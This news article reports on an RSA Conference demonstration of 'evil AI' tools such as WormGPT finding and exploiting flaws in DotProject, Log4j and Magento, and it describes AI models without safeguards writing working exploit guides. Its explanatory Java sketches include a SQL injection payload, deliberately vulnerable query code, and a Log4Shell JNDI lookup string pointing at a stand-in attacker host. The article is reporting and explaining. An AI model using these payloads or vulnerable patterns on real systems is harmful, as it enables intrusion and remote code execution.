Threat Analysts Reveal How "Evil AI" is Changing Hacking Dynamics

As these "evil AI" platforms advance quickly, cybersecurity experts fear that traditional defences will fail to keep up.

A new wave of AI tools developed with no ethical restrictions is allowing hackers to detect and exploit software vulnerabilities faster than ever before.

Earlier this week at the annual RSA Conference in San Francisco, a crowd filled a room at the Moscone Center for what was touted as a technical investigation of artificial intelligence's role in contemporary hacking.

The session, led by Sherri Davidoff and Matt Durrin of LMG Security, promised more than theory: a rare, live demonstration of so-called "evil AI" in operation, a topic that has quickly moved from cyberpunk fiction to real-world concern.

Davidoff, LMG Security's CEO and founder, opened with a sobering reminder of the constant threat posed by software flaws. Then, as PCWorld senior editor Alaina Yee reported, Durrin, the company's Director of Training and Research, swiftly changed the tone, introducing the idea of "evil AI": artificial intelligence tools created without moral boundaries that can spot and exploit software vulnerabilities before defenders can respond.

"What if hackers utilise their malevolent AI tools, which lack safeguards, to detect vulnerabilities before we have the opportunity to address them?" Durrin asked the audience, previewing the unsettling demonstrations to come. 

The team's attempts to acquire one of these rogue AIs, with names like GhostGPT and DevilGPT, often ended in frustration or unease. Their persistence finally paid off when they obtained WormGPT, a tool mentioned in a Brian Krebs piece, for $50 via Telegram channels.

As Durrin explained, WormGPT is effectively ChatGPT stripped of its ethical constraints: it will answer any question, no matter how harmful or illegal the request. The presenters stressed, however, that the real concern is not the tool's existence but its capabilities.

The LMG Security team began by feeding an older version of WormGPT the source code of DotProject, an open-source project management platform. The AI correctly identified a SQL injection vulnerability and proposed a basic exploit, but it failed to construct a working attack, most likely because it could not parse the entire codebase.
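DotProject is written in PHP, so what follows is not its actual code; it is a minimal, generic Java sketch of the vulnerability class WormGPT flagged, contrasting a query assembled by string concatenation (injectable) with a parameterized query that closes the hole. The users table and column names are hypothetical.

import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

public class SqlInjectionSketch {

    // VULNERABLE: user input is spliced directly into the SQL string.
    // Passing  ' OR '1'='1  as the username makes the WHERE clause
    // always true and returns every row in the (hypothetical) users table.
    static ResultSet findUserUnsafe(Connection conn, String username) throws SQLException {
        Statement stmt = conn.createStatement();
        return stmt.executeQuery(
                "SELECT id, username FROM users WHERE username = '" + username + "'");
    }

    // SAFE: a parameterized query keeps the input out of the SQL grammar,
    // so the same payload is treated as a literal value, not as SQL.
    static ResultSet findUserSafe(Connection conn, String username) throws SQLException {
        PreparedStatement ps = conn.prepareStatement(
                "SELECT id, username FROM users WHERE username = ?");
        ps.setString(1, username);
        return ps.executeQuery();
    }
}

The fix is not subtle, which is precisely the presenters' point: the danger lies in how quickly an unrestricted model can locate such flaws across a large codebase, not in the novelty of the flaws themselves.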

A revised version of WormGPT was then tasked with investigating the notorious Log4j vulnerability. This time, the AI not only found the flaw but also provided enough detail that, as Davidoff noted, "an intermediate hacker" could use it to craft an exploit.
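For context on why Log4j made such an instructive target: the Log4Shell flaw (CVE-2021-44228) meant that any application logging attacker-controlled text with a vulnerable Log4j 2 release (2.14.1 and earlier) would evaluate ${jndi:...} lookups embedded in that text, letting an attacker trigger the loading of remote code. A minimal sketch of the vulnerable pattern follows; the attacker.example address is hypothetical.

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Log4ShellSketch {

    private static final Logger LOG = LogManager.getLogger(Log4ShellSketch.class);

    public static void main(String[] args) {
        // In a real attack this string arrives in attacker-controlled input,
        // for example an HTTP User-Agent header. The server is hypothetical.
        String userAgent = "${jndi:ldap://attacker.example/a}";

        // On Log4j 2.x up to 2.14.1, formatting this message triggers a JNDI
        // lookup to the attacker's LDAP server, which can hand back a payload
        // the JVM then loads. Patched releases (2.15.0+) disable the lookup.
        LOG.info("Request from user agent: {}", userAgent);
    }
}

Notably, even the parameterized "{}" form was exploitable, because vulnerable versions performed lookup substitution on the final formatted message.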

The real surprise came with the most recent iteration: WormGPT provided step-by-step instructions, complete with code tailored to the test server, and those instructions worked flawlessly.

To push the limits further, the team built a deliberately vulnerable Magento e-commerce installation. WormGPT uncovered a complicated two-part exploit that went undetected by popular security tools such as SonarQube, and by ChatGPT itself. During the live demonstration, the rogue AI produced a full hacking guide, unprompted and with alarming speed. As the session closed, Davidoff remarked on the rapid progress of malicious AI tools.